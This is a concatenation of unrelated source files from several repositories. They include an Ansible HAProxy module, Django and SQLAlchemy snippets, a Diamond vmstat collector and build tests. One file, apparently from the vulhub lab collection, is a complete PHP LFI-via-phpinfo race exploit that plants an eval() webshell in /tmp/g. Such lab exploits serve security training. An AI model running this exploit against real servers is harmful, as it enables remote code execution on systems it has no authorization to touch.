to the specified server. This can be used to terminate long-running
sessions after a server is put into maintenance mode. Overridden by the
drain option.
type: bool
default: 'no'
socket:
description:
- Path to the HAProxy socket file.
default: /var/run/haproxy.sock
state:
description:
- Desired state of the provided backend host.
- Note that C(drain) state was added in version 2.4. It is supported only by HAProxy version 1.5 or later,
if used on versions < 1.5, it will be ignored.
required: true
choices: [ "enabled", "disabled", "drain" ]
fail_on_not_found:
description:
- Fail whenever trying to enable/disable a backend host that does not exist
type: bool
default: 'no'
version_added: "2.2"
wait:
description:
- Wait until the server reports a status of 'UP' when `state=enabled`,
status of 'MAINT' when `state=disabled` or status of 'DRAIN' when `state=drain`
type: bool
default: 'no'
version_added: "2.0"
wait_interval:
description:
- Number of seconds to wait between retries.
default: 5
version_added: "2.0"
wait_retries:
description:
- Number of times to check for status after changing the state.
default: 25
version_added: "2.0"
weight:
description:
- The value passed in argument. If the value ends with the `%` sign, then
the new weight will be relative to the initially configured weight.
Relative weights are only permitted between 0 and 100% and absolute
weights are permitted between 0 and 256.
'''
EXAMPLES = '''
# disable server in 'www' backend pool
- haproxy:
state: disabled
host: '{{ inventory_hostname }}'
backend: www
# disable server without backend pool name (apply to all available backend pool)
- haproxy:
state: disabled
host: '{{ inventory_hostname }}'
# disable server, provide socket file
- haproxy:
state: disabled
host: '{{ inventory_hostname }}'
socket: /var/run/haproxy.sock
backend: www
# disable server, provide socket file, wait until status reports in maintenance
- haproxy:
state: disabled
host: '{{ inventory_hostname }}'
socket: /var/run/haproxy.sock
backend: www
wait: yes
# Place server in drain mode, providing a socket file. Then check the server's
# status every minute to see if it changes to maintenance mode, continuing if it
# does in an hour and failing otherwise.
- haproxy:
state: disabled
host: '{{ inventory_hostname }}'
socket: /var/run/haproxy.sock
backend: www
wait: yes
drain: yes
wait_interval: 1
wait_retries: 60
# disable backend server in 'www' backend pool and drop open sessions to it
- haproxy:
state: disabled
host: '{{ inventory_hostname }}'
backend: www
socket: /var/run/haproxy.sock
shutdown_sessions: true
# disable server without backend pool name (apply to all available backend pool) but fail when the backend host is not found
- haproxy:
state: disabled
host: '{{ inventory_hostname }}'
fail_on_not_found: yes
# enable server in 'www' backend pool
- haproxy:
state: enabled
host: '{{ inventory_hostname }}'
backend: www
# enable server in 'www' backend pool wait until healthy
- haproxy:
state: enabled
host: '{{ inventory_hostname }}'
backend: www
wait: yes
# enable server in 'www' backend pool wait until healthy. Retry 10 times with intervals of 5 seconds to retrieve the health
- haproxy:
state: enabled
host: '{{ inventory_hostname }}'
backend: www
wait: yes
wait_retries: 10
wait_interval: 5
# enable server in 'www' backend pool with change server(s) weight
- haproxy:
state: enabled
host: '{{ inventory_hostname }}'
socket: /var/run/haproxy.sock
weight: 10
backend: www
# set the server in 'www' backend pool to drain mode
- haproxy:
state: drain
host: '{{ inventory_hostname }}'
socket: /var/run/haproxy.sock
backend: www
'''
import csv
import socket
import time
from string import Template
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_bytes, to_text
DEFAULT_SOCKET_LOCATION = "/var/run/haproxy.sock"
RECV_SIZE = 1024
ACTION_CHOICES = ['enabled', 'disabled', 'drain']
WAIT_RETRIES = 25
WAIT_INTERVAL = 5
######################################################################
class TimeoutException(Exception):
    """Raised when an HAProxy socket operation exceeds its time budget.

    NOTE(review): defined but not raised anywhere in the code shown here.
    """
    pass
class HAProxy(object):
    """
    Used for communicating with HAProxy through its local UNIX socket interface.
    Perform common tasks in Haproxy related to enable server and
    disable server.
    The complete set of external commands Haproxy handles is documented
    on their website:
    http://haproxy.1wt.eu/download/1.5/doc/configuration.txt#Unix Socket commands
    """

    def __init__(self, module):
        self.module = module
        # Cache every module parameter as an attribute for convenience.
        self.state = self.module.params['state']
        self.host = self.module.params['host']
        self.backend = self.module.params['backend']
        self.weight = self.module.params['weight']
        self.socket = self.module.params['socket']
        self.shutdown_sessions = self.module.params['shutdown_sessions']
        self.fail_on_not_found = self.module.params['fail_on_not_found']
        self.wait = self.module.params['wait']
        self.wait_retries = self.module.params['wait_retries']
        self.wait_interval = self.module.params['wait_interval']
        self._drain = self.module.params['drain']
        # Accumulates commands, raw socket output and before/after state for
        # the final exit_json() payload.
        self.command_results = {}

    def execute(self, cmd, timeout=200, capture_output=True):
        """
        Executes a HAProxy command by sending a message to a HAProxy's local
        UNIX socket and waiting up to 'timeout' milliseconds for the response.

        NOTE(review): ``timeout`` is accepted but never applied to the socket
        (no settimeout() call) -- confirm whether enforcing it is intended.
        """
        self.client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.client.connect(self.socket)
        self.client.sendall(to_bytes('%s\n' % cmd))
        # Drain the socket until the peer closes (recv returns b'').
        result = b''
        buf = self.client.recv(RECV_SIZE)
        while buf:
            result += buf
            buf = self.client.recv(RECV_SIZE)
        result = to_text(result, errors='surrogate_or_strict')
        if capture_output:
            self.capture_command_output(cmd, result.strip())
        self.client.close()
        return result

    def capture_command_output(self, cmd, output):
        """
        Capture the output for a command
        """
        if 'command' not in self.command_results:
            self.command_results['command'] = []
        self.command_results['command'].append(cmd)
        if 'output' not in self.command_results:
            self.command_results['output'] = []
        self.command_results['output'].append(output)

    def discover_all_backends(self):
        """
        Discover all entries with svname = 'BACKEND' and return a list of their corresponding
        pxnames
        """
        # 'show stat' returns CSV prefixed with '# '; strip it for DictReader.
        data = self.execute('show stat', 200, False).lstrip('# ')
        r = csv.DictReader(data.splitlines())
        return tuple(map(lambda d: d['pxname'], filter(lambda d: d['svname'] == 'BACKEND', r)))

    def discover_version(self):
        """
        Attempt to extract the haproxy version.
        Return a tuple containing major and minor version, or None on failure.
        """
        data = self.execute('show info', 200, False)
        lines = data.splitlines()
        line = [x for x in lines if 'Version:' in x]
        try:
            version_values = line[0].partition(':')[2].strip().split('.', 3)
            version = (int(version_values[0]), int(version_values[1]))
        except (ValueError, TypeError, IndexError):
            version = None
        return version

    def execute_for_backends(self, cmd, pxname, svname, wait_for_status=None):
        """
        Run some command on the specified backends. If no backends are provided they will
        be discovered automatically (all backends)
        """
        # Discover backends if none are given
        if pxname is None:
            backends = self.discover_all_backends()
        else:
            backends = [pxname]
        # Run the command for each requested backend
        for backend in backends:
            # Fail when backends were not found
            state = self.get_state_for(backend, svname)
            if (self.fail_on_not_found) and state is None:
                self.module.fail_json(
                    msg="The specified backend '%s/%s' was not found!" % (backend, svname))
            if state is not None:
                self.execute(Template(cmd).substitute(pxname=backend, svname=svname))
                if self.wait:
                    self.wait_until_status(backend, svname, wait_for_status)

    def get_state_for(self, pxname, svname):
        """
        Find the state of specific services. When pxname is not set, get all backends for a specific host.
        Returns a tuple of dictionaries containing the status, weight and
        current-session count for those services, or None when none matched.
        """
        data = self.execute('show stat', 200, False).lstrip('# ')
        r = csv.DictReader(data.splitlines())
        state = tuple(
            map(
                lambda d: {'status': d['status'], 'weight': d['weight'], 'scur': d['scur']},
                filter(lambda d: (pxname is None or d['pxname']
                                  == pxname) and d['svname'] == svname, r)
            )
        )
        return state or None

    def wait_until_status(self, pxname, svname, status):
        """
        Wait for a service to reach the specified status. Try RETRIES times
        with INTERVAL seconds of sleep in between. If the service has not reached
        the expected status in that time, the module will fail. If the service was
        not found, the module will fail.
        """
        # NOTE(review): range(1, n) performs n-1 attempts; preserved as-is so
        # the effective retry budget does not silently change.
        for i in range(1, self.wait_retries):
            state = self.get_state_for(pxname, svname)
            # We can assume there will only be 1 element in state because both svname and pxname are always set when we get here
            if state[0]['status'] == status:
                # Bug fix: the original compared the whole ``state`` tuple to
                # the string 'MAINT' (always False), so waiting for a drained
                # server to reach MAINT could never succeed.  Compare the
                # reported status field instead.
                if not self._drain or (state[0]['scur'] == '0' and state[0]['status'] == 'MAINT'):
                    return True
            else:
                time.sleep(self.wait_interval)
        self.module.fail_json(msg="server %s/%s not status '%s' after %d retries. Aborting." %
                              (pxname, svname, status, self.wait_retries))

    def enabled(self, host, backend, weight):
        """
        Enabled action, marks server to UP and checks are re-enabled,
        also supports to get current weight for server (default) and
        set the weight for haproxy backend server when provides.
        """
        cmd = "get weight $pxname/$svname; enable server $pxname/$svname"
        if weight:
            cmd += "; set weight $pxname/$svname %s" % weight
        self.execute_for_backends(cmd, backend, host, 'UP')

    def disabled(self, host, backend, shutdown_sessions):
        """
        Disabled action, marks server to DOWN for maintenance. In this mode, no more checks will be
        performed on the server until it leaves maintenance,
        also it shutdown sessions while disabling backend host server.
        """
        cmd = "get weight $pxname/$svname; disable server $pxname/$svname"
        if shutdown_sessions:
            cmd += "; shutdown sessions server $pxname/$svname"
        self.execute_for_backends(cmd, backend, host, 'MAINT')

    def drain(self, host, backend, status='DRAIN'):
        """
        Drain action, sets the server to DRAIN mode.
        In this mode, the server will not accept any new connections
        other than those that are accepted via persistence.
        """
        haproxy_version = self.discover_version()
        # check if haproxy version supports DRAIN state (starting with 1.5)
        if haproxy_version and (1, 5) <= haproxy_version:
            cmd = "set server $pxname/$svname state drain"
            self.execute_for_backends(cmd, backend, host, status)

    def act(self):
        """
        Figure out what you want to do from ansible, and then do it.
        """
        # Get the state before the run
        state_before = self.get_state_for(self.backend, self.host)
        self.command_results['state_before'] = state_before
        # toggle enable/disable server
        if self.state == 'enabled':
            self.enabled(self.host, self.backend, self.weight)
        elif self.state == 'disabled' and self._drain:
            # 'disabled' + drain: drain first, then expect MAINT.
            self.drain(self.host, self.backend, status='MAINT')
        elif self.state == 'disabled':
            self.disabled(self.host, self.backend, self.shutdown_sessions)
        elif self.state == 'drain':
            self.drain(self.host, self.backend)
        else:
            self.module.fail_json(msg="unknown state specified: '%s'" % self.state)
        # Get the state after the run
        state_after = self.get_state_for(self.backend, self.host)
        self.command_results['state_after'] = state_after
        # Report change status
        if state_before != state_after:
            self.command_results['changed'] = True
            self.module.exit_json(**self.command_results)
        else:
            self.command_results['changed'] = False
            self.module.exit_json(**self.command_results)
def main():
    """Module entry point: parse arguments and apply the requested state."""
    # load ansible module object
    module = AnsibleModule(
        argument_spec=dict(
            state=dict(required=True, default=None, choices=ACTION_CHOICES),
            host=dict(required=True, default=None),
            backend=dict(required=False, default=None),
            weight=dict(required=False, default=None),
            socket=dict(required=False, default=DEFAULT_SOCKET_LOCATION),
            shutdown_sessions=dict(required=False, default=False, type='bool'),
            fail_on_not_found=dict(required=False, default=False, type='bool'),
            wait=dict(required=False, default=False, type='bool'),
            wait_retries=dict(required=False, default=WAIT_RETRIES, type='int'),
            wait_interval=dict(required=False, default=WAIT_INTERVAL, type='int'),
            drain=dict(default=False, type='bool'),
        ),
    )
    # Bug fix: the original tested ``if not socket:``, which referenced the
    # imported ``socket`` *module* (always truthy), so the guard could never
    # fire.  Check the actual socket-path parameter instead.
    if not module.params['socket']:
        module.fail_json(msg="unable to locate haproxy socket")
    ansible_haproxy = HAProxy(module)
    ansible_haproxy.act()
|
WSDC-NITWarangal/django | refs/heads/master | django/views/__init__.py | 12133432 | |
tarunlnmiit/django-crispy-forms | refs/heads/dev | crispy_forms/models.py | 12133432 | |
brandonPurvis/osf.io | refs/heads/develop | api_tests/files/__init__.py | 12133432 | |
gauravbose/digital-menu | refs/heads/master | django/conf/locale/tr/__init__.py | 12133432 | |
knewmanTE/FrameworkBenchmarks | refs/heads/master | frameworks/Python/turbogears/models/World.py | 79 | from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column
from sqlalchemy.types import String, Integer
Base = declarative_base()
class World(Base):
    """ORM row for the benchmark ``world`` table: an id plus a random number."""
    __tablename__ = "world"
    id = Column(Integer, primary_key = True)
    randomNumber = Column(Integer)
    def serialize(self):
        """Return a plain-dict form of the row, suitable for JSON responses."""
        return {
            'id' : int(self.id),
            'randomNumber' : int(self.randomNumber)
        }
|
esikachev/my-dev-client | refs/heads/master | my_dev/utils.py | 1 | import os
def write_to_config(username, host):
    """Persist connection settings to ``~/.my.conf`` in INI format,
    overwriting any existing file."""
    config_path = os.path.join(os.path.expanduser("~"), '.my.conf')
    contents = '[DEFAULT]\nusername=%s\nhost=%s\n' % (username, host)
    with open(config_path, 'w') as cfg:
        cfg.write(contents)
|
vulhub/vulhub | refs/heads/master | php/inclusion/exp.py | 1 | #!/usr/bin/python
import sys
import threading
import socket
def setup(host, port):
    """Build the three request strings used by the attack.

    Returns a tuple (REQ1, TAG, LFIREQ):
      REQ1   -- oversized multipart phpinfo() POST that makes PHP spill the
                upload to a temp file and echo its [tmp_name] back;
      TAG    -- marker string used to detect successful inclusion;
      LFIREQ -- GET template for the vulnerable LFI script (two %s slots:
                temp file path and Host header value).

    NOTE(review): ``port`` is accepted but unused here; callers pass it
    separately to the socket code.
    """
    TAG="Security Test"
    # Payload written into the uploaded temp file: drops a one-line eval()
    # webshell to /tmp/g when the temp file is included by the LFI script.
    PAYLOAD="""%s\r
<?php file_put_contents('/tmp/g', '<?=eval($_REQUEST[1])?>')?>\r""" % TAG
    REQ1_DATA="""-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
    # Large padding slows phpinfo() page generation, widening the race
    # window during which the temp file still exists on disk.
    padding="A" * 5000
    REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """+padding+"""\r
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
HTTP_PRAGMA: """+padding+"""\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" %(len(REQ1_DATA),host,REQ1_DATA)
    #modify this to suit the LFI script
    LFIREQ="""GET /lfi.php?file=%s HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
Host: %s\r
\r
\r
"""
    return (REQ1, TAG, LFIREQ)
def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
    """Race one phpinfo() upload against the LFI endpoint.

    Sends the multipart phpinfo() request on one socket, scrapes the
    reported [tmp_name] temp-file path out of the first ``offset`` bytes of
    the response, then immediately requests that path through the LFI
    script on a second socket.  Returns the temp path on success, None on
    a lost race or missing marker.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s2.connect((host, port))
    s.send(phpinforeq)
    d = ""
    # Read at least ``offset`` bytes -- enough to contain [tmp_name].
    while len(d) < offset:
        d += s.recv(offset)
    try:
        i = d.index("[tmp_name] => ")
        # NOTE(review): the +17/+31 slice assumes phpinfo's HTML-encoded
        # output ('=&gt;') and a 14-character temp path -- confirm against
        # the target's actual output.
        fn = d[i+17:i+31]
    except ValueError:
        return None
    s2.send(lfireq % (fn, host))
    d = s2.recv(4096)
    s.close()
    s2.close()
    # Our tag appearing in the LFI response means the payload executed.
    if d.find(tag) != -1:
        return fn
counter=0
class ThreadWorker(threading.Thread):
    """Worker thread that repeatedly retries the phpinfo race until one
    attempt succeeds or the shared attempt budget is exhausted."""
    def __init__(self, e, l, m, *args):
        threading.Thread.__init__(self)
        self.event = e          # shared stop event, set on success
        self.lock = l           # guards the module-global attempt counter
        self.maxattempts = m    # cap on attempts across all workers
        self.args = args        # forwarded verbatim to phpInfoLFI()
    def run(self):
        global counter
        while not self.event.is_set():
            # Reserve one attempt under the lock before racing.
            with self.lock:
                if counter >= self.maxattempts:
                    return
                counter+=1
            try:
                x = phpInfoLFI(*self.args)
                if self.event.is_set():
                    break
                if x:
                    # Truthy result is the temp path -- the shell landed.
                    print "\nGot it! Shell created in /tmp/g"
                    self.event.set()
            except socket.error:
                # Connection problems end this worker quietly.
                return
def getOffset(host, port, phpinforeq):
    """Gets offset of tmp_name in the php output"""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    s.send(phpinforeq)
    d = ""
    # Read the full (chunked) response.
    while True:
        i = s.recv(4096)
        d+=i
        if i == "":
            break
        # detect the final chunk
        if i.endswith("0\r\n\r\n"):
            break
    s.close()
    i = d.find("[tmp_name] => ")
    if i == -1:
        raise ValueError("No php tmp_name in phpinfo output")
    print "found %s at %i" % (d[i:i+10],i)
    # padded up a bit
    return i+256
def main():
    """Parse host/port/pool-size arguments, measure the tmp_name offset,
    then run a pool of ThreadWorker threads racing the LFI until success,
    the attempt budget runs out, or the user interrupts."""
    print "LFI With PHPInfo()"
    print "-=" * 30
    if len(sys.argv) < 2:
        print "Usage: %s host [port] [threads]" % sys.argv[0]
        sys.exit(1)
    try:
        host = socket.gethostbyname(sys.argv[1])
    except socket.error, e:
        print "Error with hostname %s: %s" % (sys.argv[1], e)
        sys.exit(1)
    # Optional second argument: target port (default 80).
    port=80
    try:
        port = int(sys.argv[2])
    except IndexError:
        pass
    except ValueError, e:
        print "Error with port %d: %s" % (sys.argv[2], e)
        sys.exit(1)
    # Optional third argument: worker-pool size (default 10).
    poolsz=10
    try:
        poolsz = int(sys.argv[3])
    except IndexError:
        pass
    except ValueError, e:
        print "Error with poolsz %d: %s" % (sys.argv[3], e)
        sys.exit(1)
    print "Getting initial offset...",
    reqphp, tag, reqlfi = setup(host, port)
    offset = getOffset(host, port, reqphp)
    sys.stdout.flush()
    maxattempts = 1000
    # Event signals success to all workers; lock guards the global counter.
    e = threading.Event()
    l = threading.Lock()
    print "Spawning worker pool (%d)..." % poolsz
    sys.stdout.flush()
    tp = []
    for i in range(0,poolsz):
        tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))
    for t in tp:
        t.start()
    try:
        # Poll once a second, printing attempt progress until success/budget.
        while not e.wait(1):
            if e.is_set():
                break
            with l:
                sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))
                sys.stdout.flush()
            if counter >= maxattempts:
                break
        print
        if e.is_set():
            print "Woot! \m/"
        else:
            print ":("
    except KeyboardInterrupt:
        print "\nTelling threads to shutdown..."
        e.set()
    print "Shuttin' down..."
    for t in tp:
        t.join()
if __name__=="__main__":
main() |
ColdrickSotK/storyboard | refs/heads/master | storyboard/db/migration/alembic_migrations/versions/059_add_a_table_for_comment_history.py | 1 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Add a table for comment history
Revision ID: 059
Revises: 058
Create Date: 2016-06-21 14:00:20.515139
"""
# revision identifiers, used by Alembic.
revision = '059'
down_revision = '058'
from alembic import op
import sqlalchemy as sa
from storyboard.db.decorators import UTCDateTime
from storyboard.db.models import MYSQL_MEDIUM_TEXT
def upgrade(active_plugins=None, options=None):
    """Create the ``comments_history`` table that stores prior revisions of
    edited comments."""
    op.create_table(
        'comments_history',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('created_at', UTCDateTime(), nullable=True),
        sa.Column('updated_at', UTCDateTime(), nullable=True),
        sa.Column('content', MYSQL_MEDIUM_TEXT, nullable=True),
        sa.Column('comment_id', sa.Integer(), nullable=False),
        # Each history row points back at the live comment it snapshots.
        sa.ForeignKeyConstraint(['comment_id'], ['comments.id'],
                                name='fk_comment_id'),
        sa.PrimaryKeyConstraint('id')
    )
def downgrade(active_plugins=None, options=None):
    """Drop the ``comments_history`` table created by upgrade()."""
    op.drop_table('comments_history')
|
Block137/Dual2 | refs/heads/Dual2 | mk/PX4/Tools/genmsg/test/test_genmsg_command_line.py | 216 | # Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
def test_includepath_to_dict():
    """includepath_to_dict maps 'pkg:path' strings to {pkg: [path]},
    splitting on the first colon only, so paths may themselves contain colons."""
    from genmsg.command_line import includepath_to_dict
    assert {} == includepath_to_dict([])
    assert {'std_msgs': [ 'foo' ]} == includepath_to_dict(['std_msgs:foo'])
    # 'baz:colon' must survive intact: only the first ':' separates pkg from path.
    assert {'std_msgs': [ 'foo' ], 'bar_msgs': [ 'baz:colon' ]} == includepath_to_dict(['std_msgs:foo', 'bar_msgs:baz:colon'])
|
mei3am/androguard | refs/heads/master | androcsign.py | 38 | #!/usr/bin/env python
# This file is part of Androguard.
#
# Copyright (C) 2012, Anthony Desnos <desnos at t0t0.fr>
# All rights reserved.
#
# Androguard is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Androguard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Androguard. If not, see <http://www.gnu.org/licenses/>.
import sys
from androguard.core import androconf
sys.path.append("./elsim/")
from elsim.elsign import dalvik_elsign
from optparse import OptionParser
option_0 = { 'name' : ('-i', '--input'), 'help' : 'file : use this filename', 'nargs' : 1 }
option_1 = { 'name' : ('-r', '--remove'), 'help' : 'remote the signature', 'nargs' : 1 }
option_2 = { 'name' : ('-o', '--output'), 'help' : 'output database', 'nargs' : 1 }
option_3 = { 'name' : ('-l', '--list'), 'help' : 'list signatures in database', 'nargs' : 1 }
option_4 = { 'name' : ('-c', '--check'), 'help' : 'check signatures in database', 'nargs' : 1 }
option_5 = { 'name' : ('-v', '--version'), 'help' : 'version of the API', 'action' : 'count' }
options = [option_0, option_1, option_2, option_3, option_4, option_5]
def main(options, arguments) :
    """Dispatch on parsed CLI options: add, list, remove or check entries in
    an elsign CSignature database, or print the tool version."""
    s = dalvik_elsign.CSignature(pcs=dalvik_elsign.PublicCSignature)
    if options.input != None :
        # Build a signature from the input file; store it when -o was given.
        ret = s.add_file( open( options.input, "rb" ).read() )
        if ret != None and options.output != None :
            s.add_indb( ret, options.output )
    elif options.list != None :
        s.list_indb( options.list )
    elif options.remove != None :
        # Removal rewrites the database given via -o.
        s.remove_indb( options.remove, options.output )
    elif options.check != None :
        s.check_db( options.check )
    elif options.version != None :
        print "Androcsign version %s" % androconf.ANDROGUARD_VERSION
if __name__ == "__main__" :
parser = OptionParser()
for option in options :
param = option['name']
del option['name']
parser.add_option(*param, **option)
options, arguments = parser.parse_args()
sys.argv[:] = arguments
main(options, arguments)
|
Ssawa/Diamond | refs/heads/master | src/collectors/vmstat/vmstat.py | 16 | # coding=utf-8
"""
Uses /proc/vmstat to collect data on virtual memory manager
#### Dependencies
* /proc/vmstat
"""
import diamond.collector
import os
import re
class VMStatCollector(diamond.collector.Collector):
    """Collects paging and swap activity counters from /proc/vmstat."""

    PROC = '/proc/vmstat'

    # /proc/vmstat counters increase monotonically; MAX_COUNTER tells
    # derivative() how to handle counter wrap-around.
    MAX_VALUES = {
        'pgfault': diamond.collector.MAX_COUNTER,
        'pgmajfault': diamond.collector.MAX_COUNTER,
        'pgpgin': diamond.collector.MAX_COUNTER,
        'pgpgout': diamond.collector.MAX_COUNTER,
        'pswpin': diamond.collector.MAX_COUNTER,
        'pswpout': diamond.collector.MAX_COUNTER,
    }

    # Matches "<counter> <value>" lines for the counters above.  Raw
    # string (the original plain-string '\s'/'\d' are invalid escape
    # sequences on modern Python) and compiled once at class-definition
    # time instead of on every collect() call.
    _LINE_RE = re.compile(
        r'^(pgfault|pgmajfault|pgpgin|pgpgout|pswpin|pswpout)\s(\d+)')

    def get_default_config_help(self):
        """Return the config help map (no collector-specific options)."""
        config_help = super(VMStatCollector, self).get_default_config_help()
        config_help.update({
        })
        return config_help

    def get_default_config(self):
        """
        Returns the default collector settings
        """
        config = super(VMStatCollector, self).get_default_config()
        config.update({
            'path': 'vmstat'
        })
        return config

    def collect(self):
        """Read /proc/vmstat and publish per-interval derivatives of the
        tracked counters.

        Returns None when the file is not readable.
        """
        if not os.access(self.PROC, os.R_OK):
            return None

        # `with` guarantees the handle is closed even if publish() raises;
        # it also avoids shadowing the (Python 2) builtin `file`.
        with open(self.PROC) as proc_file:
            for line in proc_file:
                match = self._LINE_RE.match(line)
                if not match:
                    continue
                name = match.group(1)
                value = int(match.group(2))
                derived = self.derivative(name, value, self.MAX_VALUES[name])
                self.publish(name, derived, raw_value=value, precision=2)
|
clar/gyp | refs/heads/master | test/make_global_settings/full-toolchain/gyptest-make_global_settings.py | 83 | #!/usr/bin/env python
# Copyright (c) 2014 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies make_global_settings works with the full toolchain.
"""
import os
import sys
import TestGyp
if sys.platform == 'win32':
  # Neither cross compiling with ninja nor make is usable on Windows,
  # so there is nothing to verify there.
  sys.exit(0)

test = TestGyp.TestGyp(formats=['ninja'])

# The behavior under test only applies to a format with a flavor (the part
# after the '-').  We want a non-host toolchain, so pick a flavor the ninja
# generator does not know about; otherwise it would default to the
# host-specific tools (e.g., 'otool' on mac to generate the .TOC).
#
# format=['ninja-some_toolchain'] cannot simply be passed to the
# constructor above, because then this test would no longer be recognized
# as a ninja format test.
test.formats = [
    'ninja-my_flavor' if fmt == 'ninja' else fmt for fmt in test.formats
]

gyp_file = 'make_global_settings.gyp'

# Tell the .gyp file where my_nm.py / my_readelf.py live and which python
# executable should run them.
test.run_gyp(gyp_file,
             '-Dworkdir=%s' % test.workdir,
             '-Dpython=%s' % sys.executable)

build_args = ['-v'] if test.format == 'ninja-my_flavor' else []
test.build(gyp_file, arguments=build_args)

test.must_contain_all_lines(test.stdout(), ['MY_CC', 'MY_CXX'])
test.must_contain(test.built_file_path('RAN_MY_NM'), 'RAN_MY_NM')
test.must_contain(test.built_file_path('RAN_MY_READELF'), 'RAN_MY_READELF')
test.pass_test()
|
errx/django | refs/heads/master | django/contrib/gis/db/models/sql/query.py | 32 | from django.db import connections
from django.db.models.query import sql
from django.contrib.gis.db.models.constants import ALL_TERMS
from django.contrib.gis.db.models.fields import GeometryField
from django.contrib.gis.db.models.sql import aggregates as gis_aggregates
from django.contrib.gis.db.models.sql.conversion import AreaField, DistanceField, GeomField
from django.contrib.gis.db.models.sql.where import GeoWhereNode
from django.contrib.gis.geometry.backend import Geometry
from django.contrib.gis.measure import Area, Distance
class GeoQuery(sql.Query):
    """
    A single spatial SQL query.
    """
    # Overriding the valid query terms so the spatial lookup terms from
    # ALL_TERMS are accepted alongside the regular ones.
    query_terms = ALL_TERMS
    # Use the GIS-aware aggregate implementations.
    aggregates_module = gis_aggregates
    compiler = 'GeoSQLCompiler'

    #### Methods overridden from the base Query class ####
    def __init__(self, model, where=GeoWhereNode):
        super(GeoQuery, self).__init__(model, where)
        # The following attributes are customized for the GeoQuerySet.
        # The GeoWhereNode and SpatialBackend classes contain backend-specific
        # routines and functions.
        self.custom_select = {}
        self.transformed_srid = None
        self.extra_select_fields = {}

    def clone(self, *args, **kwargs):
        # The base clone() knows nothing about the GIS-specific state set
        # in __init__, so copy it over explicitly.
        obj = super(GeoQuery, self).clone(*args, **kwargs)
        # Customized selection dictionary and transformed srid flag have
        # to also be added to obj.
        obj.custom_select = self.custom_select.copy()
        obj.transformed_srid = self.transformed_srid
        obj.extra_select_fields = self.extra_select_fields.copy()
        return obj

    def convert_values(self, value, field, connection):
        """
        Using the same routines that Oracle does we can convert our
        extra selection objects into Geometry and Distance objects.
        TODO: Make converted objects 'lazy' for less overhead.
        """
        if connection.ops.oracle:
            # Running through Oracle's first.
            value = super(GeoQuery, self).convert_values(value, field or GeomField(), connection)
        if value is None:
            # Output from spatial function is NULL (e.g., called
            # function on a geometry field with NULL value).
            pass
        elif isinstance(field, DistanceField):
            # Using the field's distance attribute, can instantiate
            # `Distance` with the right context.
            value = Distance(**{field.distance_att: value})
        elif isinstance(field, AreaField):
            value = Area(**{field.area_att: value})
        elif isinstance(field, (GeomField, GeometryField)) and value:
            value = Geometry(value)
        elif field is not None:
            # Not a GIS field: defer entirely to the base implementation.
            return super(GeoQuery, self).convert_values(value, field, connection)
        return value

    def get_aggregation(self, using, force_subq=False):
